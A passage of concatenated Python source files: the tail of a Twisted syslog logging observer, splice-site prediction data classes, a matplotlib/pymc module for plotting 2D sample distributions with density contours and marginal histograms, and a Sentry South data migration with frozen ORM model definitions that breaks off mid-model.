            priority = syslog.LOG_ALERT
        if 'syslogPriority' in eventDict:
            priority = int(eventDict['syslogPriority'])
        facility = 0
        if 'syslogFacility' in eventDict:
            facility = int(eventDict['syslogFacility'])

        # Drop trailing empty lines, then send each remaining line;
        # continuation lines are prefixed with a tab.
        lines = text.split('\n')
        while lines and lines[-1] == '':
            lines.pop()
        for index, line in enumerate(lines):
            if index:
                line = '\t' + line
            self.syslog(priority | facility,
                        '[%s] %s' % (eventDict['system'], line))
def startLogging(prefix='Twisted', options=DEFAULT_OPTIONS,
                 facility=DEFAULT_FACILITY, setStdout=1):
    """
    Send all Twisted logging output to syslog from now on.

    The prefix, options and facility arguments are passed to
    C{syslog.openlog()}, see the Python syslog documentation for details. For
    other parameters, see L{twisted.python.log.startLoggingWithObserver}.
    """
    # Creating the observer opens the syslog connection; registering its
    # emit method routes all subsequent Twisted log events through it.
    observer = SyslogObserver(prefix, options, facility)
    log.startLoggingWithObserver(observer.emit, setStdout=setStdout)
|
unknown
|
codeparrot/codeparrot-clean
| ||
import string
class predictions(object):
    """Container for splice-site predictions: positions and their scores."""

    def __init__(self, positions=None, scores=None):
        self.positions = positions
        self.scores = scores

    def set_positions(self, positions):
        self.positions = positions

    def get_positions(self):
        return self.positions

    def set_scores(self, scores):
        self.scores = scores

    def get_scores(self):
        return self.scores

    def __str__(self):
        # repr() replaces the Python 2-only backtick syntax; the output is
        # identical.  (Note: the original format has no separator before
        # 'scores:', which is preserved.)
        return 'positions: ' + repr(self.positions) + 'scores: ' + repr(self.scores)

    def __repr__(self):
        return self.__str__()
class sequence(object):
    """A named nucleotide sequence with a (start, end) region of interest
    and empty acceptor/donor prediction slots."""

    def __init__(self, name, seq, bounds):
        # `bounds` is a (start, end) pair.  Python 2's tuple-parameter
        # syntax was removed in Python 3, so unpack explicitly; callers
        # still pass the tuple positionally, unchanged.
        (start, end) = bounds
        assert(start<end<len(seq))
        self.start = start
        self.end = end
        self.name = name
        self.seq = seq
        self.preds = dict()
        self.preds['acceptor'] = predictions()
        self.preds['donor'] = predictions()

    def __str__(self):
        # repr() replaces the Python 2-only backtick syntax; output unchanged.
        s = "start:" + repr(self.start)
        s += " end:" + repr(self.end)
        s += " name:" + repr(self.name)
        s += " sequence:" + repr(self.seq[0:10])
        s += "... preds:" + repr(self.preds)
        return s

    def __repr__(self):
        return self.__str__()
def seqdict(dic, bounds):
    """Take a fasta dict and generate a list of sequence objects from it.

    dic -- object with an ordered_items() method yielding
           (name, sequence_string) pairs.
    bounds -- (start, end) pair; a negative end counts back from the end
              of each sequence.
    """
    # Python 2's tuple-parameter syntax was removed in Python 3; unpack
    # explicitly.  Callers still pass the tuple positionally, unchanged.
    (start, end) = bounds
    sequences = list()
    # Build a 256-entry translation table: every byte maps to an uppercase
    # ACGT letter, and all non-ACGT characters are mapped to 'A'.
    tab = ''
    for i in range(256):
        c = chr(i).upper()
        if c in 'ACGT':
            tab += c
        else:
            tab += 'A'
    for seqname in dic.ordered_items():
        # str.translate with a 256-char table behaves like the removed
        # string.translate() in both Python 2 and 3 (assumes the input
        # contains only 8-bit characters — TODO confirm for this data).
        seq = seqname[1].translate(tab)
        seq = seq.upper()
        if end < 0:
            stop = len(seq) + end
        else:
            stop = end
        sequences.append(sequence(seqname[0], seq, (start, stop)))
    return sequences
|
unknown
|
codeparrot/codeparrot-clean
| ||
import pylab
import numpy as np
import pymc
import matplotlib.patches
from mpl_toolkits.axes_grid1 import make_axes_locatable
import scipy.stats
def frac_inside_poly(x,y,polyxy):
    """Calculate the fraction of points x,y inside polygon polyxy.

    polyxy -- list of x,y coordinates of vertices.
    """
    # matplotlib.nxutils was removed in matplotlib 1.3; Path.contains_points
    # is the documented replacement and returns the same boolean mask.
    from matplotlib.path import Path
    xy = np.vstack([x,y]).transpose()
    return float(np.count_nonzero(Path(polyxy).contains_points(xy))) / len(x)
def fracs_inside_contours(x, y, contours):
    """Calculate the fraction of points x,y inside each contour level.

    contours -- a matplotlib.contour.QuadContourSet
    """
    fracs = []
    # Only the first path of each level's collection is considered, matching
    # the original behavior (levels made of several paths are truncated).
    for collection in contours.collections:
        path = collection.get_paths()[0]
        pathxy = path.vertices
        fracs.append(frac_inside_poly(x, y, pathxy))
    return fracs
def frac_label_contours(x, y, contours, format='%.3f'):
    """Label contours according to the fraction of points x,y inside.
    """
    # Map each contour level to the formatted fraction of points it encloses.
    fracs = fracs_inside_contours(x, y, contours)
    labels = dict((level, format % frac)
                  for (level, frac) in zip(contours.levels, fracs))
    contours.clabel(fmt=labels)
def contour_enclosing(x, y, fractions, xgrid, ygrid, zvals,
                      axes, nstart = 200,
                      *args, **kwargs):
    """Plot contours encompassing specified fractions of points x,y.

    A large set of trial contour levels (nstart of them) is drawn first;
    the levels whose enclosed point fractions match the requested
    `fractions` are then found by interpolation and redrawn.
    """
    # (Removed a stray debug `print fractions` statement, which was also
    # Python 2-only syntax.)
    # Generate a large set of contours initially.
    contours = axes.contour(xgrid, ygrid, zvals, nstart,
                            extend='both')
    # Set up fracs and levs for interpolation, sorted by fraction.
    levs = contours.levels
    fracs = np.array(fracs_inside_contours(x,y,contours))
    sortinds = np.argsort(fracs)
    levs = levs[sortinds]
    fracs = fracs[sortinds]
    # Find the levels that give the specified fractions.
    # np.interp replaces scipy.interp, which was removed from SciPy and was
    # always just an alias for numpy.interp.
    levels = np.interp(fractions, fracs, levs)
    # Remove the trial contours from the graph.
    for coll in contours.collections:
        coll.remove()
    # Reset the contours to only the requested levels.
    contours.__init__(axes, xgrid, ygrid, zvals, levels, *args, **kwargs)
    return contours
def plot2Ddist(variables, axeslist=None, truevalues=None,
               trimto=None, thin=1, histbinslist=[100, 100],
               labels=None, scaleview=True,
               plotscatter=True, plothists=True, plotcontours=True,
               contourKDEthin=1, contourNGrid=100,
               contourFractions=[0.6827, 0.9545, 0.9973],
               labelcontours=True, returncontours=False,
               scatterstyle={}, histstyle={}, contourstyle={}, **styleArgs):
    """Plot joint distribution of two variables, with marginal histograms.

    The resulting graphic includes (at your discretion):

    * a scatter plot of the 2D distribution of the two variables

    * estimated density contours for the distribution

    * marginal histograms for each variable

    See plot2Ddist_example.py for an example:

    > plot2Ddist([a, b], truevalues=[intercept, slope], **styleargs)

    Notes
    -----

    The contour plotting can be quite slow for large samples because
    of the gaussian kernel density estimation. Try passing a larger
    value for contourKDEthin to speed it up.

    NOTE(review): the mutable default arguments (histbinslist,
    contourFractions, scatterstyle, histstyle, contourstyle) are read-only
    here, so sharing between calls is currently harmless — but confirm
    before adding any mutation of them.

    Inputs
    ------
    variables -- list-like of length 2
        a list of two array-like or pymc.Variable objects. The lengths
        of the arrays or variable traces should be equal.
    axeslist -- list-like of length 3
        a list of three Matplotlib Axes for: the joint plot, marginal
        x histogram, and marginal y histogram, respectively.
    truevalues -- list-like of length 2
        a list of the true values for each variable
    trimto -- int
        plot only the last trimto elements of each variable
    thin -- int
        plot only every thin-th element of each variable
    histbinlist -- list-like of length 2
        specify the bins (number or limits) for x and y marginal histograms.
    labels -- list-like of two strings
        the x and y axis labels
    scaleview -- bool
        whether to set the axes limits according to the plotted data
    plotscatter, plothists, plotcontours -- bool
        whether to plot the scatter, marginal histograms, and contours
    scatterstyle, histstyle, contourstyle -- dict-like
        additional keyword arguments for the plot, hist, or contour commands
    contourKDEthin -- int
        factor by which to thin the samples before calculating the
        gaussian kernel density estimate for contouring
    contourNGrid -- int
        size of the grid to use (in each dimension) for the contour plotting
    contourFractions -- list-like
        countours are chosen to include the fractions of points specified here
    labelcontours -- bool
        whether to label the contours with the fraction of points enclosed
    styleArgs --
        leftover arguments are passed to both the plot and hist commands
    """

    ### Set up figures and axes. ###
    # If no axes are given, build a square figure with the joint axes in the
    # middle and the two marginal-histogram axes attached top and right.
    if axeslist is None:
        fig1 = pylab.figure(figsize=(6,6))
        fig1.set_label('traces')
        ax1 = pylab.gca()
        divider = make_axes_locatable(ax1)
        ax2 = divider.append_axes("top", 1.5, pad=0.0, sharex=ax1)
        ax3 = divider.append_axes("right", 1.5, pad=0.0, sharey=ax1)
        # Hide tick labels on the marginal axes; they share the joint axes'
        # scales anyway.
        for tl in (ax2.get_xticklabels() + ax2.get_yticklabels() +
                   ax3.get_xticklabels() + ax3.get_yticklabels()):
            tl.set_visible(False)
        axeslist = (ax1, ax2, ax3)
    # If only the joint axes is given, derive the marginal axes from it.
    elif (len(axeslist) == 1):
        ax1 = axeslist[0]
        divider = make_axes_locatable(ax1)
        ax2 = divider.append_axes("top", 1.5, pad=0.0, sharex=ax1)
        ax3 = divider.append_axes("right", 1.5, pad=0.0, sharey=ax1)
        for tl in (ax2.get_xticklabels() + ax2.get_yticklabels() +
                   ax3.get_xticklabels() + ax3.get_yticklabels()):
            tl.set_visible(False)
        axeslist = (ax1, ax2, ax3)
    else:
        ax1, ax2, ax3 = axeslist

    # Thin and trim variables.
    if labels is None:
        passedlabels = False
        labels = [None, None]
    else:
        passedlabels = True

    for (ivar, variable) in enumerate(variables):
        # Get the trace if this is a pymc.Variable object.
        # NOTE(review): this replaces elements of the caller's `variables`
        # list in place — confirm callers do not rely on the original list.
        if isinstance(variable, pymc.Variable):
            variables[ivar] = variable.trace()
            if hasattr(variable, '__name__') and not passedlabels:
                labels[ivar] = variable.__name__

    if trimto is None:
        trimto = len(variables[0])
    # Keep only the last `trimto` samples, every `thin`-th one.
    x = variables[0][-trimto::thin]
    y = variables[1][-trimto::thin]

    ### Plot the variables. ###

    # Plot 2D scatter of variables.
    if plotscatter:
        # NOTE(review): alpha is a string here; matplotlib coerces it, but a
        # float would be clearer — confirm before changing.
        style = {'ls':'', 'marker':',', 'color':'r', 'alpha':'0.5'}
        style.update(styleArgs)
        style.update(scatterstyle)
        ax1.plot(x, y, **style)

    if plotcontours:
        # Thin (possibly more aggressively) for the KDE, which is the
        # expensive step.
        xkde = variables[0][-trimto::contourKDEthin]
        ykde = variables[1][-trimto::contourKDEthin]
        # Inspired by Abraham Flaxman's https://gist.github.com/626689
        style = {'linewidths':2.0, 'alpha':0.75,
                 #'cmap':matplotlib.cm.Greys,
                 'zorder':10}
        style.update(styleArgs)
        style.update(contourstyle)
        # Axes.contour expects 'colors' (plural), not 'color'.
        if 'color' in style:
            style['colors'] = style['color']
        # Evaluate a gaussian KDE of the samples on a regular grid.
        gkde = scipy.stats.gaussian_kde([xkde,ykde])
        xgrid, ygrid = np.mgrid[min(x):max(x):contourNGrid * 1j,
                                min(y):max(y):contourNGrid * 1j]
        zvals = np.array(gkde.evaluate([xgrid.flatten(),
                                        ygrid.flatten()])
                         ).reshape(xgrid.shape)
        contours = contour_enclosing(x, y, contourFractions,
                                     xgrid, ygrid, zvals,
                                     ax1, **style)

    # Plot marginal histograms.
    if plothists:
        style = {'normed':True}
        style.update(styleArgs)
        style.update(histstyle)
        ax2.hist(x, histbinslist[0], **style)
        ax3.hist(y, histbinslist[1], orientation='horizontal', **style)

    # Plot lines for the true values.
    if truevalues is not None:
        ax1.axvline(x=truevalues[0], ls=':', c='k')
        ax1.axhline(y=truevalues[1], ls=':', c='k')
        ax2.axvline(x=truevalues[0], ls=':', c='k')
        ax3.axhline(y=truevalues[1], ls=':', c='k')

    if scaleview:
        # Rescale all three axes to the plotted data; pin the histogram
        # count axes at zero.
        ax2.relim()
        ax3.relim()
        ax1.relim()
        ax2.autoscale_view(tight=True)
        ax3.autoscale_view(tight=True)
        ax1.autoscale_view(tight=True)
        ax2.set_ylim(bottom=0)
        ax3.set_xlim(left=0)

    if labels[0] is not None:
        ax1.set_xlabel(labels[0])
    if labels[1] is not None:
        ax1.set_ylabel(labels[1])

    if plotcontours and labelcontours:
        frac_label_contours(x, y, contours)

    if plotcontours and returncontours:
        return axeslist, contours
    else:
        return axeslist
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
    def forwards(self, orm):
        # Imported at migration run time so the current receiver logic is
        # applied against the frozen ORM models below.
        from sentry.receivers.rules import create_default_rules
        Project = orm['sentry.Project']
        Rule = orm['sentry.Rule']
        # Backfill: create the default alert rules for every existing
        # project, as if each project had just been created.
        for project in Project.objects.all():
            create_default_rules(instance=project, created=True, RuleModel=Rule)
def backwards(self, orm):
pass
models = {
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': "orm['sentry.AlertRelatedGroup']", 'to': "orm['sentry.Group']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Alert']"}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'values_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'team_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.TeamMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['sentry.User']"})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
